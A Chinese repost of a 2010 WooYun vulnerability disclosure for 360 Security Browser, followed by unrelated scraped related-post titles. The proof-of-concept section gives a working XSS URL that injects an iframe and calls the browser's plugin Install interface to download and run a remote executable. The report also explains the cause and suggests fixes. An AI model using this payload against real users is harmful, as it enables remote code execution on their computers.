本文摘自乌云
出处:http://www.anquan.us/static/bugs/wooyun-2010-020.html
作者:结界师
缺陷编号:WooYun-2010-00020

1.漏洞基本情况:关键页面的XSS+任意插件安装+插件安装时不检验来源–>任意代码执行

2.详细说明:
360浏览器为了扩展自己的功能,在内部实现了一系列的扩展接口,并且通过web可以调用这些接口,但是在跨越安全边界时唯一的检查就是调用的来源,必须为域名a.b.c.d(假设)才可以调用这些接口。而此域名中存在XSS漏洞。从而可以使用js直接调用这些接口。某些接口如插件支持上可以下载远程的可执行程序直接执行,同时执行的时候并没有对来源应用程序做签名等认证,导致可以直接下载恶意程序执行。

3.漏洞证明:
http://a.b.c.d/v3/guide/guide_start.htm?ver=a.b.c.d&firstcheck=1&1="><iframe name=“fuck” src=“http://a.b.c.d/v3/plugins.htm” οnlοad=alert(fuck.window.eval(“Install(‘ExtWebMail’,‘a.b.c.d3’,‘360邮件通’,‘http://a.b.c.d/ExtWebmail.zip’,‘a.b.c.d’)”))>< /iframe>

其中ExtWebmail.zip里自定义的ExtWebmail.exe将会被执行

4.修复方案:
(1)修复xss(无法解决域名a.b.c.d下的其他安全问题)
(2)验证程序的来源(无法解决其他接口的问题)

学习日志13:360安全浏览器远程代码执行漏洞相关推荐

  1. CVE-2018-8174 IE浏览器远程代码执行漏洞

    0x00漏洞简介 在2018年5月9日的时候360发表了一份apt攻击分析及溯源报告 文中提到了cve-2018-8174这个漏洞的首次在apt方面的应用 原文地址:http://www.4hou.c ...

  2. 【漏洞复现】IE 浏览器远程代码执行漏洞

    Windows VBScript Engine 代码执行漏洞(CVE-2018-8174) 在2018年5月9日的时候360发表了一份apt攻击分析及溯源报告 文中提到了cve-2018-8174这个 ...

  3. 【漏洞复现】IE 浏览器远程代码执行漏洞(CVE-2018-8174)

    一.CVE-2018-8174(本质是 Windows VBScript Engine 代码执行漏洞) 由于 VBScript 脚本执行引擎(vbscript.dll)存在代码执行漏洞,攻击者可以将恶 ...

  4. Json学习总结(6)——Fastjson远程代码执行漏洞

    一.修复方法 最近发现fastjson在1.2.24以及之前版本存在远程代码执行高危安全漏洞,为了保证系统安全,请升级到1.2.28/1.2.29/1.2.30/1.2.31或者更新版本. 1.2.2 ...

  5. log4j2远程代码执行漏洞学习总结

    log4j2远程代码执行漏洞学习总结 背景 近期log4j2的漏洞闹得沸沸扬扬,在工作之余也是找了一些资料看一下相关的内容,到现在网上的总结已经很全了,B站上有各种漏洞复现,各大博客类网站关于JNDI ...

  6. 代码审计之CVE-2017-6920 Drupal远程代码执行漏洞学习

     1.背景介绍: CVE-2017-6920是Drupal Core的YAML解析器处理不当所导致的一个远程代码执行漏洞,影响8.x的Drupal Core. Drupal介绍:Drupal 是一个由 ...

  7. c++获取一段代码的执行时间_微软IE浏览器JScript脚本引擎远程代码执行漏洞通告...

    文档信息 编号 QiAnXinTI-SV-2019-0022 关键字 IE JScript RCE 远程命令执行CVE-2019-1367 发布日期 2019年09月24日 更新日期 2019年09月 ...

  8. IE浏览器远程代码执行高危漏洞(CVE-2019-1367)

    IE浏览器远程代码执行高危漏洞(CVE-2019-1367)加固遇到的问题 一.背景介绍 Internet Explorer,是微软公司推出的一款网页浏览器.用户量极大.9月23日微软紧急发布安全更新 ...

  9. struts2远程代码执行漏洞合集

    声明 好好学习,天天向上 S2-001 漏洞描述 因为用户提交表单数据并且验证失败时,后端会将用户之前提交的参数值使用 OGNL 表达式 %{value} 进行解析,然后重新填充到对应的表单数据中.例 ...

最新文章

  1. Azure实践之automation自动整理资产信息
  2. sv队列和动态数组的区别_Go 刷 LeetCode 系列:经典(7) 设计双端队列
  3. 微信“拍一拍”的后悔药来了!手滑拍了老板终于有救了
  4. xib中的label加边框
  5. LeetCode OJ - Construct Binary Tree from Preorder and Inorder Traversal
  6. 百度地图json_R: 民政部官网市级行政地图的绘制
  7. 玩转计划任务命令:schtasks
  8. 微信支付宝扫码支付相关接口
  9. ufs2.1 android bench,一加UFS 3.0手机极限测试 对比UFS2.1测评
  10. TIBCO中国胡长城谈:中国企业工作流应用
  11. 读书笔记(平凡的世界)
  12. html图片无损压缩,有损压缩和无损压缩的区别是什么
  13. 迈向智能世界2030的九大技术挑战与研究方向
  14. springboot定制和关闭banner
  15. thymeleaf引用图片_thymeleaf显示图片(转)
  16. 让你最快速地改善代码质量的 20 条编程规范
  17. 社区发现研究现状(一)
  18. 宗镜录略讲——南怀瑾老师——系列2
  19. 求第 N 个 斐波那契数的多种方法
  20. sql server 数据库表中增加列,增加字段,插入列,插入字段,修改列,修改字段,

热门文章

  1. Dev C++或者 codeblocks编译出现 [Error] ld returned 1 exit status
  2. Spring Cloud Alibaba配置实例nacos+sentinel+dubbo实行服务注册、配置中心、熔断限流
  3. 出现`webpack-dev-server --inline --progress --config build/webpack.dev.conf.js`报错
  4. UE4制作尸潮爬墙学习笔记
  5. 关于我初赛的一些要背的东西 错题集
  6. brat报错:The server encountered a serious error, please contact the administrators at ____ and give th
  7. Qt下的国际化方法—翻译文件(.ts .qm文件)的使用
  8. ui设计移动端字体适配_移动端UI界面设计:APP字体排版设计的七个原则
  9. 《ybtoj高效进阶》第五部分第六章例题3 耗费体力
  10. 李振杰:中科红旗的生与死